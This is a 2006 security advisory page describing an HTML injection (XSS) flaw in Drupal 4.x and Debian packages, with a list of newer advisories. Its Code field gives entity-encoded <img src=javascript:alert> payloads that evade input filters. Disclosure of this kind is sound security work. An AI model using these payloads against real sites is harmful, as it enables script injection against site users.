exploits , vulnerabilities , articles , Drupal URL-Encoded Input HTML Injection Vulnerability

Title	Drupal URL-Encoded Input HTML Injection Vulnerability
Published	2006-01-01-12:00AM
Updated	2006-01-02-08:45PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovery is credited to liz0@bsdmail.com.
Vulnerable	Drupal Drupal 4.6.5 Drupal Drupal 4.6.4 Drupal Drupal 4.6.3 Drupal Drupal 4.6.2 Drupal Drupal 4.6.1 Drupal Drupal 4.6 Drupal Drupal 4.5.7 Drupal Drupal 4.5.6 Drupal Drupal 4.5.5 Drupal Drupal 4.5.4 Drupal Drupal 4.5.3 Debian Linux 3.1 Debian Linux 3.1 alpha Debian Linux 3.1 arm Debian Linux 3.1 hppa Debian Linux 3.1 ia32 Debian Linux 3.1 ia64 Debian Linux 3.1 m68k Debian Linux 3.1 mips Debian Linux 3.1 mipsel Debian Linux 3.1 ppc Debian Linux 3.1 s/390 Debian Linux 3.1 sparc Drupal Drupal 4.5.2 Drupal Drupal 4.5.2 Drupal Drupal 4.5.1 Drupal Drupal 4.5 Drupal Drupal 4.4.3 Drupal Drupal 4.4.2 Drupal Drupal 4.4.1 Drupal Drupal 4.4 Drupal Drupal 4.2 .0 RC Drupal Drupal 4.1 .0 Drupal Drupal 4.0 .0
Not Vulnerable
Code	The following URL-encoded examples were provided: <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41> <img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41> <img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> The discoverer has also provided an online tool to encode various strings at the following location: http://liz0zim.no-ip.org/code.php
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-18 ReVou Comment Field HTML Injection Vulnerability
• 2009-12-18 Adobe Flash Media Server Resource Exhaustion Remote Denial of Service Vulnerability
• 2009-12-18 Centreon Authentication Mechanism Security Bypass Vulnerability
• 2009-12-18 Family Connections Multiple Input Validation Vulnerabilities
• 2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
• 2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
• 2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
• 2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
• 2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
• 2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 01:43:44 +0000